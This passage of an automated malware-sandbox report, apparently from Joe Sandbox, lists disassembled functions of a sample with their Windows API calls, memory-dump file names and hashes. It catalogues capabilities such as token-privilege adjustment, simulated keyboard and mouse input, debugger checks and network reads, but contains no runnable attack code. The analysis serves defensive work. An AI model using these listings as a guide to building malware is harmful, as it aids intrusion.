                                                                                                                                                                                                                                                                                                    • Instruction ID: 2db464ff9638b15df81041c8efaa78e9b157449dfd4df15947f501da9af2c3b7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5669693d4c2142d9629925bd05ce4bfc877f307a9d6971e318d682f29267fa2a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A51E371A00210AFEB14AF28D886F6A77E5AB49718F08909CF9457F3D3D770AC41CBA1
                                                                                                                                                                                                                                                                                                    Function 00EB26DD Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 292994002-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4057b4e685671144ec199daebd4833977a6fa68a196f7ac951ceb424b36ae86a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7d6812c0fb8f7d58fa96a716eca15ba7a3c28138f3aebe43499ff1914ae61e92
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4057b4e685671144ec199daebd4833977a6fa68a196f7ac951ceb424b36ae86a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 622102357002208FD7119F26C844B9B7BE4EF85328F18906EE949AB351DF71EC42CB94
                                                                                                                                                                                                                                                                                                    Function 00E9D889 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 00E9D8CE
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00E9D92F
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000000), ref: 00E9D943
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 234945975-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ed813625763814847bc5cac74e5698599a9d77a2b888087d9f9015eaf7777af7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3e0183d0cc5fcdaf51846c6fc5c487165d7a77c1ddf097411f60bc4ae98cfc37
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed813625763814847bc5cac74e5698599a9d77a2b888087d9f9015eaf7777af7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53219071508715AFEB30AF66DC44BAB77FCEB81318F105429E646B2252E7B4EA04CB50
                                                                                                                                                                                                                                                                                                    Function 00E8E472 Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?,00E646AC), ref: 00E8E482
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00E8E491
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00E8E4A2
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 00E8E4AE
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a8d7674d4f974fe8f1bacb505b6faa7a35e8cdd462e71961601290165dc9e007
                                                                                                                                                                                                                                                                                                    • Instruction ID: 11f245354f9a2347b4c0a49f09a2d79b1603587ded3a0f1dcebdf2dc10fe4904
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8d7674d4f974fe8f1bacb505b6faa7a35e8cdd462e71961601290165dc9e007
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9CF0E5304189155BD21477BCAC0D8AB776DAF82339B504701F83EE22F0E7B8DD998795
                                                                                                                                                                                                                                                                                                    Function 00E7E5F4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                                                                                                                                                    • String ID: %.3d$X64
                                                                                                                                                                                                                                                                                                    • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                                                    • Opcode ID: f55ba394fd00baf9830b510a4e309ed1ff763f7a662d40947e3b63944c9f27b3
                                                                                                                                                                                                                                                                                                    • Instruction ID: f69c92baf664259c4dbff148077ea7ce6942eb16d3a4afc3f1fd453561de5eaa
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f55ba394fd00baf9830b510a4e309ed1ff763f7a662d40947e3b63944c9f27b3
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4ED012B1C08208DACBC096D19D4CCFA77BCAB1C300F10E4A2F90AB1140F630D9089721
                                                                                                                                                                                                                                                                                                    Function 00E52992 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00E52A8A
                                                                                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00E52A94
                                                                                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00E52AA1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9726e720339795f85e557b173841f47f9a00f0f5a2fac0d152bc2797a6aba0f9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 842faf3feeaaa9f9d297ff8e67ec679e20c05d12a261d5aef8cd16b976fd07d0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9726e720339795f85e557b173841f47f9a00f0f5a2fac0d152bc2797a6aba0f9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2731B37590122C9BCB21DF68DD8979DBBB8AF08310F5052EAE90CA6261E7309F858F45
                                                                                                                                                                                                                                                                                                    Function 00E82010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00E409D8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E4014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00E409F5
                                                                                                                                                                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E8205A
                                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E82087
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00E82097
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 577356006-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1aff544471719055826b1d3bfa7cb1ed4b8d71abd54ff37d3fb8f012d3dcb437
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4c1af9e59e536c0b108b470c25ad5e05ec6c924fa7fd0664490284a4f816a918
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1aff544471719055826b1d3bfa7cb1ed4b8d71abd54ff37d3fb8f012d3dcb437
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C11C1B1404304AFD718AF54ECC6D6BB7F8EB04724B20852EF54A63251EB70BC41CB20
                                                                                                                                                                                                                                                                                                    Function 00E45058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00E4502E,?,00EE98D8,0000000C,00E45185,?,00000002,00000000), ref: 00E45079
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00E4502E,?,00EE98D8,0000000C,00E45185,?,00000002,00000000), ref: 00E45080
                                                                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00E45092
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 93a5775474876f20eca98e3aea06b0a651870dd24fa8cb84aacc31cef925991e
                                                                                                                                                                                                                                                                                                    • Instruction ID: 49ff5578b4fb33dd9a98130eaad76419b0d47de080873f71c9503f42427a8dbd
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93a5775474876f20eca98e3aea06b0a651870dd24fa8cb84aacc31cef925991e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14E08C36400508AFCF216F65ED08E593BA9EF51385F004514F809BA133EB75DD46CBC0
                                                                                                                                                                                                                                                                                                    Function 00E8ECD0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00E8ED04
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: mouse_event
                                                                                                                                                                                                                                                                                                    • String ID: DOWN
                                                                                                                                                                                                                                                                                                    • API String ID: 2434400541-711622031
                                                                                                                                                                                                                                                                                                    • Opcode ID: cf452b193376da57ecc41995ef0a4bc955befe8a5c741418425abbcb553c4407
                                                                                                                                                                                                                                                                                                    • Instruction ID: 72a869028621d4920a9f60ac7b2f5fe4a925054c01b4270811bd69b445ac4a80
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cf452b193376da57ecc41995ef0a4bc955befe8a5c741418425abbcb553c4407
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13E0C266AADB763CB94431297C0BFF7438C8F22B38B112256FC18F61C0ED905C8656B8
                                                                                                                                                                                                                                                                                                    Function 00E7E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00E7E664
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: NameUser
                                                                                                                                                                                                                                                                                                    • String ID: X64
                                                                                                                                                                                                                                                                                                    • API String ID: 2645101109-893830106
                                                                                                                                                                                                                                                                                                    • Opcode ID: 855a6977fd509b9583c857b971c41a0759f4a9befd073cc4e228f2daac695a3c
                                                                                                                                                                                                                                                                                                    • Instruction ID: 24cf8fc1c57821e786a1e24583c4aa4a3bb113ee730260f8549f21c669364549
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 855a6977fd509b9583c857b971c41a0759f4a9befd073cc4e228f2daac695a3c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DD0C9B480511DEACB80DB90EC88DDA77BCBB08304F104691F106B2140D73095488B10
                                                                                                                                                                                                                                                                                                    Function 00E941FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00EA52EE,?,?,00000035,?), ref: 00E94229
                                                                                                                                                                                                                                                                                                    • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00EA52EE,?,?,00000035,?), ref: 00E94239
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3479602957-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: fe660c8c377bab3a5ce06902661ebf6d4873c72ae6fdd22bc6efeb8cdef19143
                                                                                                                                                                                                                                                                                                    • Instruction ID: e3de9795b8da206c8fb01375449a1b14be06154e15c249631f483611fe9cdf65
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe660c8c377bab3a5ce06902661ebf6d4873c72ae6fdd22bc6efeb8cdef19143
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4F0E5706042256AEB2057A6AC4DFEB36ADFFC5B61F000275F605F21D1D9709D04C7B0
                                                                                                                                                                                                                                                                                                    Function 00E8BBED Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00E8BC24
                                                                                                                                                                                                                                                                                                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00E8BC37
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: InputSendkeybd_event
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3536248340-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c9a08be070b895ca11b32bb967061876f7bebc96e6a319fecdb6ddb8211e81f5
                                                                                                                                                                                                                                                                                                    • Instruction ID: 5e67d52866963ab9f0d7240fe85c4c2019df8d0348d0d0bf3df8d5951f6e554a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9a08be070b895ca11b32bb967061876f7bebc96e6a319fecdb6ddb8211e81f5
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17F06D7080424DAFDB019FA1C805BFFBBB0FF08309F00901AF955A5191D7798205DF94
                                                                                                                                                                                                                                                                                                    Function 00E81A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E81B48), ref: 00E81A20
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00E81B48), ref: 00E81A35
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 81990902-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5d6f761fe547ce3feb92538ad6612a2a92607529bd12f1059bf7dc4d6a5292f3
                                                                                                                                                                                                                                                                                                    • Instruction ID: b5ea5d271792aba5978ec6c703a6a8fb96a96ab1a888ab7aa942fbcfbe555f56
